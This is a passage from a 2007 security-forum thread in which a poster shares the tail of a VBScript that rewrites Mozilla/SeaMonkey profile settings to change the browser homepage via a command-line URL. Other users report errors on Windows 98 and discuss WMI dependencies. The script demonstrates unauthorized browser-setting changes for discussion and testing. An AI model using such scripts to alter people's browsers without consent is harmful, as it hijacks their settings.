          bInSection = True
          ElseIf InStr(strline, "[") = 1 Then
            bInSection = False
          End If
        End If
    
        If bInSection Then 
          If bItemExists = False Then
            tfDestINI.WriteLine strline
            if len(strValue) => 1 then ' Don't write item out if Value is empty
              tfDestINI.WriteLine strItem & "=" & strValue
            end if 
            bwrote = True
            bInSection = False
          ElseIf sLeftofEquals = UCase(strItem) Then
            if len(strValue) => 1 then ' Don't write item out if Value is empty
              tfDestINI.WriteLine strItem & "=" & strValue
            end if 
            bwrote = True
            bInSection = False
          Else
            tfDestINI.WriteLine strline
          End If
        Else
          tfDestINI.WriteLine strline
        End If
      Wend
      If bSectionExists = False Then ' strSection doesn't exist
        tfDestINI.WriteLine
        tfDestINI.WriteLine "[" & strSection & "]"
        tfDestINI.WriteLine strItem & "=" & strValue
      End If
    
      tfSourceINI.Close
      tfDestINI.Close
      If Err.Number = 0 Then
        fso.DeleteFile strfilename
        fso.CopyFile strWorkingFile , strFilename
        DeleteFile(strWorkingFile)
        WriteIni = True
      Else
        DeleteFile(strWorkingFile)
        WriteIni = False
      End If
      Set tfSourceINI = Nothing
      Set tfDestINI = Nothing
    End Function 
    
    
    • Fixed the previous bug where command line does nothing.
    • If you want to use command line use, save the file and use:
      cscript filename.vbs http://site-to-change-to/
    • If you have your profile elsewhere then I'll have to parse and read registry.dat (in Application Data\Mozilla). I don't think I could do that with VBScript, but you can certainly do that with a real application.
    • Press CANCEL for the application you do not have installed. Otherwise the script will error!


    Please note:
    I am not exposing any vulnerabilities. The only reason the homepage can be changed from user mode is because the user themselves must be able to do that. I'm just using something the application was designed to do. The problem is: I DO NOT HAVE PERMISSION TO DO IT. That is why this is a bad thing.
     
    Last edited: Jul 25, 2007
  23. herbalist

    herbalist Guest

    The script didn't work on mine.
    script error.gif
    Yes, I'm running 98. It does have several user profiles and uses a non-standard path to the application data folder. When I get time to load a more conventional test image, I'll give the script a try on it.
    Rick
     
  24. herbalist

    herbalist Guest

    I get the same error message on my 98SE testbox with Sea Monkey 1.1.3. It's a single profile unit with everything in the usual places.
    Rick
     
  25. vkidv

    vkidv Registered Member

    Joined:
    Oct 6, 2003
    Posts:
    62
    Line 19 refers to WMI. It appears as if Windows 98 doesn't have WMI installed by default.

    http://www.microsoft.com/downloads/...ba-337b-4e92-8c18-a63847760ea5&DisplayLang=en

    In some ways, not having WMI installed reduces the power of scripting and makes you safer. Platforms after 98 have WMI installed by default.

    If you don't want to install the above, that is fine. I can remove "check if browser is running" so you never have to use WMI. I only use it to check if the browsers are running.

    herbalist, if you press start, run and type in %appdata%

    Do you go to the Application Data folder?

    I looked it up and it doesn't appear to be set as an environment variable in 98. I may have to use a different variable.
     
Loading...
Thread Status:
Not open for further replies.